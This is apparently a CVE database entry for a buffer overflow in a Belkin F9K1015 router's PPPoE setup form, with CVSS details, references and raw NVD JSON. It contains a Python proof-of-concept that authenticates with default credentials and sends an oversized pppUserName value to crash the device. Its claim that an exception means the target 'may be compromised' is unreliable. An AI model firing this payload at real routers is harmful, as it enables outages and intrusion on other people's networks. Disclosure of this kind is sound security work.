CVE-2025-11295

Description

A flaw has been found in Belkin F9K1015 1.00.10. This affects an unknown part of the file /goform/formPPPoESetup. This manipulation of the argument pppUserName causes buffer overflow. Remote exploitation of the attack is possible. The exploit has been published and may be used. The vendor was contacted early about this disclosure but did not respond in any way.

CVSS Details

CVSS Score

8.8

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:belkin:f9k1015_firmware:1.00.10:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:belkin:f9k1015:-:*:*:*:*:*:*:* - NOT VULNERABLE

Belkin F9K1015 1.00.10

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-11295 PoC - Belkin F9K1015 Buffer Overflow
# Vulnerability: Buffer overflow in pppUserName parameter at /goform/formPPPoESetup

import requests
import sys

TARGET = "http://192.168.1.1"
USERNAME = "admin"
PASSWORD = "password"

# Step 1: Authenticate to obtain session cookie
session = requests.Session()
login_url = f"{TARGET}/login.cgi"
login_data = {
    "loginUsername": USERNAME,
    "loginPassword": PASSWORD
}

try:
    resp = session.post(login_url, data=login_data, timeout=10)
    print(f"[*] Login response status: {resp.status_code}")
except Exception as e:
    print(f"[-] Login failed: {e}")
    sys.exit(1)

# Step 2: Craft buffer overflow payload
# pppUserName parameter with excessive length to trigger buffer overflow
overflow_payload = "A" * 4096  # Adjust length based on target buffer size

# Step 3: Send malicious request to vulnerable endpoint
exploit_url = f"{TARGET}/goform/formPPPoESetup"
exploit_data = {
    "pppUserName": overflow_payload,
    "pppPassword": "test",
    "pppAction": "connect"
}

print(f"[*] Sending exploit payload to {exploit_url}")
try:
    resp = session.post(exploit_url, data=exploit_data, timeout=10)
    print(f"[*] Response status: {resp.status_code}")
    print("[+] Exploit sent successfully")
except Exception as e:
    print(f"[-] Exploit may have crashed the target: {e}")
    print("[+] Target device may be compromised")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-11295
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-11295
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-11295/
[4] VulDB https://vuldb.com/cve/CVE-2025-11295
[5] https://github.com/panda666-888/vuls/blob/main/belkin/f9k1015/formPPPoESetup.md
[6] https://github.com/panda666-888/vuls/blob/main/belkin/f9k1015/formPPPoESetup.md#poc
[7] https://vuldb.com/?ctiid.327176
[8] https://vuldb.com/?id.327176
[9] https://vuldb.com/?submit.661299
[10] https://github.com/panda666-888/vuls/blob/main/belkin/f9k1015/formPPPoESetup.md
[11] https://github.com/panda666-888/vuls/blob/main/belkin/f9k1015/formPPPoESetup.md#poc

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-11295", "sourceIdentifier": "[email protected]", "published": "2025-10-05T17:15:32.830", "lastModified": "2025-10-07T17:18:15.807", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A flaw has been found in Belkin F9K1015 1.00.10. This affects an unknown part of the file /goform/formPPPoESetup. This manipulation of the argument pppUserName causes buffer overflow. Remote exploitation of the attack is possible. The exploit has been published and may be used. The vendor was contacted early about this disclosure but did not respond in any way."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.4, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "baseScore": 9.0, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "availabilityImpact": "COMPLETE"}, "baseSeverity": "HIGH", "exploitabilityScore": 8.0, "impactScore": 10.0, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-119"}, {"lang": "en", "value": "CWE-120"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:belkin:f9k1015_firmware:1.00.10:*:*:*:*:*:*:*", "matchCriteriaId": "3DEB0AFD-4E01-4FD5-8A41-6BD0E2D4DF0B"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:belkin:f9k1015:-:*:*:*:*:*:*:*", "matchCriteriaId": "0D273CA6-07A9-43B2-87B3-D0DE1A5B89FA"}]}]}], "references": [{"url": "https://github.com/panda666-888/vuls/blob/main/belkin/f9k1015/formPPPoESetup.md", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://github.com/panda666-888/vuls/blob/main/belkin/f9k1015/formPPPoESetup.md#poc", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://vuldb.com/?ctiid.327176", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.327176", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.661299", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://github.com/panda666-888/vuls/blob/main/belkin/f9k1015/formPPPoESetup.md", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://github.com/panda666-888/vuls/blob/main/belkin/f9k1015/formPPPoESetup.md#poc", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Third Party Advisory"]}]}}